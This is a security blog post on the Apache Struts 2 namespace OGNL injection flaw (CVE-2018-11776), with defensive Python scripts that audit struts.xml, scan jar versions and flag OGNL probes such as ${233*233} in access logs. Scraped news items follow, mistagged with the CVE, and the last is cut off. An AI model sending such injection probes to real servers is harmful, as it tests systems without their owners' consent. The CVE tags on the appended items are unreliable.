A new remote code execution [vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts 2, CVE-2018-11776, was [disclosed](<https://semmle.com/news/apache-struts-CVE-2018-11776>) yesterday. While this vulnerability does not exist with a default configuration of Struts, it does exist in commonly seen configurations for some Struts plugins.
**Update August 24, 2018**: A [dashboard for this vulnerability](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776>) is now available to download.
### The Vulnerability
Struts does not properly validate the namespace portion of a request URL. When the configuration flag `struts.mapper.alwaysSelectFullNamespace` is `true` (the Convention plugin sets it) and an action is defined without a namespace or with a wildcard namespace, or a `redirectAction`/`chain` result omits the namespace, the namespace is taken from the URL and evaluated as an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) expression. The result is OGNL injection, which leads to full remote code execution on the target system. For a more detailed technical look at the vulnerability, please see our [Threat Protection blog](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/>) on this topic. Struts 2.3 through 2.3.34 and 2.5 through 2.5.16 are affected.
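The conditions above can be checked directly in an application's `struts.xml`. The script below is an added example written for this post, not Qualys or Apache code: it parses the file and reports the three S2-057 conditions (the `alwaysSelectFullNamespace` constant, actions in a package without a fixed namespace, and `redirectAction`/`chain` results that do not pin a namespace). The sample `struts.xml` is constructed for the example; the package and action names in it are made up. Because the Convention plugin sets the flag in its own `struts-plugin.xml` rather than in the application's file, pass `assume_full_namespace=True` when that plugin is deployed.

```python
"""Audit a Struts 2 configuration for the conditions that expose CVE-2018-11776.

Added example; not Qualys or Apache code. Checks the three conditions from the
S2-057 advisory: struts.mapper.alwaysSelectFullNamespace set to true, actions in
a package with no (or a wildcard) namespace, and redirectAction/chain results
that do not pin a namespace. SAMPLE_STRUTS_XML is constructed for this example.
"""
import xml.etree.ElementTree as ET

FULL_NAMESPACE_FLAG = "struts.mapper.alwaysSelectFullNamespace"
NAMESPACE_RESULT_TYPES = {"redirectAction", "chain"}

# Constructed sample: one exposed package, one package that pins its namespaces.
SAMPLE_STRUTS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="actionChain1" class="com.example.ActionChain1">
      <result type="redirectAction">register2</result>
    </action>
  </package>
  <package name="secure" namespace="/secure" extends="struts-default">
    <action name="login" class="com.example.Login">
      <result type="redirectAction">
        <param name="actionName">home</param>
        <param name="namespace">/secure</param>
      </result>
    </action>
  </package>
</struts>
"""


def _flag_is_true(root):
    """True if any <constant> sets alwaysSelectFullNamespace to true."""
    for const in root.iter("constant"):
        if const.get("name") == FULL_NAMESPACE_FLAG:
            if (const.get("value") or "").strip().lower() == "true":
                return True
    return False


def audit_struts_config(xml_text, assume_full_namespace=False):
    """Return the advisory conditions found in a struts.xml document.

    assume_full_namespace: set when the Convention plugin is deployed, since it
    enables the flag outside this file. The config is the application's own
    file, so the stdlib parser is fine; use defusedxml for untrusted XML.
    """
    root = ET.fromstring(xml_text)
    full_ns = assume_full_namespace or _flag_is_true(root)
    findings = []
    unpinned = 0  # actions or results whose namespace would come from the URL

    for pkg in root.iter("package"):
        pkg_name = pkg.get("name", "?")
        ns = pkg.get("namespace")
        pinned = ns not in (None, "", "/*")  # "/*" is a wildcard namespace
        for action in pkg.findall("action"):
            aname = action.get("name", "?")
            if not pinned:
                unpinned += 1
                findings.append(
                    f"action '{aname}' in package '{pkg_name}' has no fixed namespace"
                )
            for result in action.findall("result"):
                if result.get("type") not in NAMESPACE_RESULT_TYPES:
                    continue
                params = {p.get("name") for p in result.findall("param")}
                if "namespace" not in params:
                    unpinned += 1
                    findings.append(
                        f"{result.get('type')} result of action '{aname}' "
                        "does not set an explicit namespace"
                    )

    if full_ns:
        findings.insert(0, f"{FULL_NAMESPACE_FLAG}=true: namespace is read from the request URL")

    return {
        "always_select_full_namespace": full_ns,
        "findings": findings,
        # The exploitable combination: a URL-derived namespace plus a place
        # where that unvalidated namespace is used.
        "exposed": full_ns and unpinned > 0,
    }


if __name__ == "__main__":
    report = audit_struts_config(SAMPLE_STRUTS_XML)
    print("exposed:", report["exposed"])
    for finding in report["findings"]:
        print(" -", finding)
```

A clean report from this script does not replace upgrading: it only tells you whether the vulnerable code path is reachable with the configuration as written, and a later config or plugin change can reopen it.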
### Recommended Response
Due to the ease of exploitation and the relatively common configuration required, this vulnerability should be patched immediately for all applications that use Struts 2. The patched versions are Struts [2.3.35](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.35>) and [2.5.17](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.17>). A public [PoC](<https://github.com/jas502n/St2-057/blob/master/README.md>) has already been published, and active attacks against this vulnerability are most likely imminent.
### Detections
Vulnerabilities in application frameworks are hard to detect programmatically with traditional VM scanning, so multiple detection methods are needed to ensure that Struts is found.
Because of this, Qualys has implemented two QIDs for detecting CVE-2018-11776 in [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>):
* **QID 13251** - This detection includes both remote and authenticated checks:
* **Remote** - This detection sends a specifically crafted payload in the request to check for command execution in .action, .go, .do, .jsp and .xhtml files under common web directories.
* **Authenticated (Linux/Unix)** - This runs `ps -ef`, looks for a Tomcat process, and locates the `struts2-core-<version>.jar` file. We are investigating using this method on other middleware technologies.
* **QID 371151** - This authenticated detection uses a Tomcat authentication record to locate the Tomcat configuration file. Once a Tomcat auth record is added, the detection reads the Tomcat location from the config, searches its subdirectories for `struts2-core-<version>.jar`, extracts the version from the jar file name and compares it with the vulnerable Struts versions.
* Both QIDs are included in Vulnerability Signatures version **VULNSIGS-2.4.403-3** or later
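For teams that want to reproduce the file-based check without the scanner, the script below is an added example (not the QID logic): it walks a deployment directory, pulls the version out of every `struts2-core-<version>.jar` name and classifies it against the fix lines named above (2.3.35 and 2.5.17). The jar names and the temporary directory layout in the demo are constructed for the example; the jar name pattern assumed is Maven's `struts2-core-<major>.<minor>.<patch>[.<extra>].jar`.

```python
"""Classify struts2-core jars by version against the CVE-2018-11776 fix.

Added example; not Qualys QID logic. Fixed releases are 2.3.35 and 2.5.17, so
2.3.x below 2.3.35 and 2.5.x below 2.5.17 are affected. File names in the demo
are constructed for this example.
"""
import os
import re

# Matches struts2-core-2.5.16.jar, struts2-core-2.3.34.jar, struts2-core-2.5.10.1.jar
JAR_NAME = re.compile(r"^struts2-core-(\d+)\.(\d+)\.(\d+)(?:[.-][0-9A-Za-z]+)*\.jar$")
FIXED_IN = {(2, 3): (2, 3, 35), (2, 5): (2, 5, 17)}


def parse_core_version(filename):
    """Return (major, minor, patch) for a struts2-core jar name, else None."""
    m = JAR_NAME.match(os.path.basename(filename))
    if not m:
        return None
    return tuple(int(g) for g in m.groups())


def is_vulnerable(version):
    """True when the version is below the fixed release of its line."""
    fixed = FIXED_IN.get(version[:2])
    if fixed is not None:
        return version < fixed
    # 2.0, 2.1 and 2.2 are end-of-life and never received the fix, so treat
    # them as affected. Anything newer than the 2.5 line carries the fix.
    return version < (2, 3, 0)


def classify_jar(filename):
    """Return (version, vulnerable) or None for files that are not struts2-core."""
    version = parse_core_version(filename)
    if version is None:
        return None
    return version, is_vulnerable(version)


def scan_tree(root_dir):
    """Walk a deployment directory and report every struts2-core jar found."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            result = classify_jar(name)
            if result is not None:
                version, vuln = result
                hits.append((os.path.join(dirpath, name), version, vuln))
    return hits


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:  # constructed webapp layout
        lib = os.path.join(tmp, "webapps", "app", "WEB-INF", "lib")
        os.makedirs(lib)
        for jar in ("struts2-core-2.5.16.jar", "struts2-convention-plugin-2.5.16.jar"):
            open(os.path.join(lib, jar), "wb").close()
        for path, version, vuln in scan_tree(tmp):
            print(path, ".".join(map(str, version)), "VULNERABLE" if vuln else "fixed")
```

Point `scan_tree()` at the Tomcat base directory (or any application server's deployment root) rather than at `/`, and remember that a shaded or renamed jar will not match the name pattern; the manifest inside the jar is the fallback in that case.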
Qualys has also implemented a QID for detecting CVE-2018-11776 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-application-scanning/>):
* **QID 150250** - This is an active detection within WAS that sends a specially-crafted payload to the scanned web application. A vulnerable application will show evidence of a command executing on the server and QID 150250 will be reported.
In addition to scanning, Qualys recommends that application frameworks such as Struts be documented in an Application Portfolio or CMDB to ensure all components of an application are recorded and can be audited for these kinds of vulnerabilities.
### Protection
Even before this RCE was disclosed, [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) users running any of the out-of-the-box templates or a generic policy were already protected from exploitation attempts. These templates, developed by security experts for the Qualys WAF programmable inspection engine, are continuously tested against the latest threats for the best detection rate and the fewest false positives.

Customers using manual policies instead of templates were potentially not protected, depending on their ELI (Expression Language Injection), CI (Code Injection) and RCE (Remote Command Execution) slider settings and on the blocking threshold.

Mitigating CVE-2018-11776 is possible by using the following methods:
* native protection using a **generic policy** (QID-226017: Expression Language Injection and QID-226008: Remote Command Execution)
* for those using a manual policy instead of an out-of-the-box template, create a **custom rule** with the condition _request.path DETECT "qid/150178"_
* or apply a **virtual patch** to QID-150250 from within the WAS module; this is equivalent to creating the rule manually, but quicker.
Today’s example, like "drupalgeddon2" (CVE-2018-7600) a few months ago, shows that Qualys WAF can block zero-days without manually defined rules, giving CISOs and IT security teams time to implement sustainable fixes while providing a tool to monitor and report any attempt to exploit the vulnerability.
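Monitoring for exploitation attempts does not require a WAF: because CVE-2018-11776 is triggered through the namespace part of the request path, the attempts leave an OGNL expression in the access log. The script below is an added example for this post, not Qualys WAF logic. It URL-decodes each request path (several rounds, to catch double encoding) and flags any path segment carrying the `${` or `%{` OGNL delimiters. The log lines are constructed for the example and the arithmetic probe `${233*233}` is a harmless expression of the kind scanners use; query strings are deliberately left out because OGNL in parameters belongs to other Struts issues.

```python
"""Flag S2-057 exploitation attempts in an Apache/Tomcat access log.

Added example; not Qualys WAF logic. The vulnerable input is the namespace
part of the request path, so only the path is inspected. SAMPLE_LOG lines are
constructed for this example.
"""
import re
from urllib.parse import unquote, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
OGNL_DELIMITERS = ("${", "%{")

SAMPLE_LOG = [
    # single-encoded ${233*233} in the namespace slot
    '203.0.113.5 - - [23/Aug/2018:10:01:22 +0000] "GET /struts2-showcase/%24%7B233*233%7D/actionChain1.action HTTP/1.1" 302 -',
    # legitimate request
    '198.51.100.7 - - [23/Aug/2018:10:01:25 +0000] "GET /struts2-showcase/actionChain1.action HTTP/1.1" 200 1234',
    # double-encoded attempt
    '203.0.113.5 - - [23/Aug/2018:10:02:03 +0000] "GET /struts2-showcase/%2524%257B233*233%257D/register2.action HTTP/1.1" 404 -',
    # %{ } form with only the braces encoded
    '203.0.113.9 - - [23/Aug/2018:10:02:40 +0000] "GET /app/%25%7B233*233%7D/index.action HTTP/1.1" 302 -',
    # OGNL-looking text in the query string: not this vulnerability, not flagged here
    '198.51.100.7 - - [23/Aug/2018:10:03:01 +0000] "GET /app/search.action?q=%24%7Bfoo%7D HTTP/1.1" 200 50',
]


def decode_path(target, max_rounds=3):
    """Percent-decode the path until it stops changing (bounded)."""
    path = urlsplit(target).path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def ognl_segment(path):
    """Return the first path segment carrying an OGNL delimiter, else None."""
    for segment in path.split("/"):
        if any(d in segment for d in OGNL_DELIMITERS):
            return segment
    return None


def scan_access_log(lines):
    """Return one hit per request whose path contains an OGNL expression."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = decode_path(m["target"])
        segment = ognl_segment(path)
        if segment is None:
            continue
        hits.append({
            "ip": m["ip"],
            "timestamp": m["ts"],
            "status": m["status"],
            "path": path,
            "segment": segment,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["timestamp"]} {hit["status"]} {hit["path"]}  <- {hit["segment"]}')
```

Treat every hit as an attempt regardless of the response status: a 404 or 302 only says what the application did with the namespace, not whether the expression was evaluated, so the hosts in the hits should be correlated with the version and configuration checks from the Detections section.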
Published 2018-08-23 by Jimmy Graham on the Qualys Security Labs blog: https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776. CVSS v2 base score for CVE-2018-11776: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C).
{"threatpost": [{"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said, \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who\u2019s researched cloud and architect solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection 
vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lockdown their Simple Storage Service (S3) buckets, Peterson said Wednesday. 
If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. 
[Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatopst. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. 
The patterns are built into the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative, he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. 
\u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. 
The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. \u201cIn the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. [Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month, which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. 
He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u201cWorking with GitHub is really nice,\u201d Fenske said. \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. 
The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201d he said. \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on an 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). 
I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Bala.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. 
Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Github and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>)_ quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. 
Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:25", "description": "Days after news broke last week that advanced, persistent threat actors penetrated nuclear facilities, researchers are explaining techniques used by adversaries to gain toeholds in similar targets in energy. Cisco Talos reported Friday that email-based attacks, leveraging template injection techniques, targeting nuclear facilities and others have been ongoing since May.\n\n\u201cTalos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers, and the vendors those providers used to deliver critical services,\u201d [researchers wrote on Friday](<http://blog.talosintelligence.com/2017/07/template-injection.html#more>).\n\nAdversaries are leveraging classic Word document-based phishing attacks, they said. However, the Word document attachments used in the phishing campaigns do not contain malicious VBA macros or embedded scripting. Instead, attachments attempt to download a malicious template file over a Server Message Block (SMB) connection so that the user\u2019s credentials can be harvested, researchers said.\n\nCisco Talos did not claim this specific attack was used against Wolf Creek Nuclear Operating Corporation or in connection with any specific attack cited in a joint report issued by the Department of Homeland Security and the Federal Bureau of Investigation last week. 
Neither did researchers claim attacks had ever led to a hacker breaching or disrupting the core systems controlling operations at an energy plant.\n\n\u201cOne objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries,\u201d Talos wrote.\n\nTargeted phishing attacks included DOCX type documents delivered as attachments under the guise of being an environmental report or a resume. While no malicious macros or scripting is embedded in the document, when a user opens it, a request is made via the SMB protocol for a template, as such \u201cContacting:\\\\\\ . . . \\Template.dotm.\u201d\n\n\u201cThe document was trying to pull down a template file from a particular IP,\u201d they noted. That connection was not via TCP 80 (often used for C2 communications), rather the SMB request was via TCP 445, a traditional Microsoft networking port.\n\nWithin the sandboxed VM \u201ca WebDAV connection was attempted over a SMB session when requesting the template.\u201d\n\nWebDAV is a Web-based Distributed Authoring and Versioning extension to the HTTP protocol that allows users to collaboratively edit and manage files on a remote server, according to [WebDAV Working Group](<http://www.webdav.org/>).\n\nUsing the WebDAV connection, the DOCX file requests a specific Relationship ID that is present in word/_rels/settings.xml.rels, or the XML instructions. According to researchers, the Relationship ID is identical to a phishing tool named Phishery, which uses the exact same ID in its template injection.\n\nPhishery is known as a credential harvester with a Word document template URL injector. 
According to the [GitHub tool description](<https://github.com/ryhanson/phishery>), \u201cPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.\u201d Once the target opens the Word document attachment sent in the phishing email, the template request reaches out to a Phishery server that triggers a dialogue box on the victim\u2019s computer requesting a Windows username and password.\n\nTalos researchers said Phishery was not used in the attacks it observed. It theorizes that the attacks may have used modified Phishery code or used the same Relationship ID to thwart analysis.\n\nIn the sample Talos examined, unlike with Phishery, which prompted users for credentials, a template file is requested from a third-party server with no Basic Authentication prompt for credentials. \u201cSuch a prompt was not needed nor seen for samples requesting the template over SMB,\u201d they wrote.\n\nOnce the target opens the Word document, a template request is made to a third-party server that initiates the download of a potentially rogue template. \u201cThe attachment instead tries to download a template file over an SMB connection so that the user\u2019s credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim\u2019s computer,\u201d researchers said.\n\nTalos explains that the 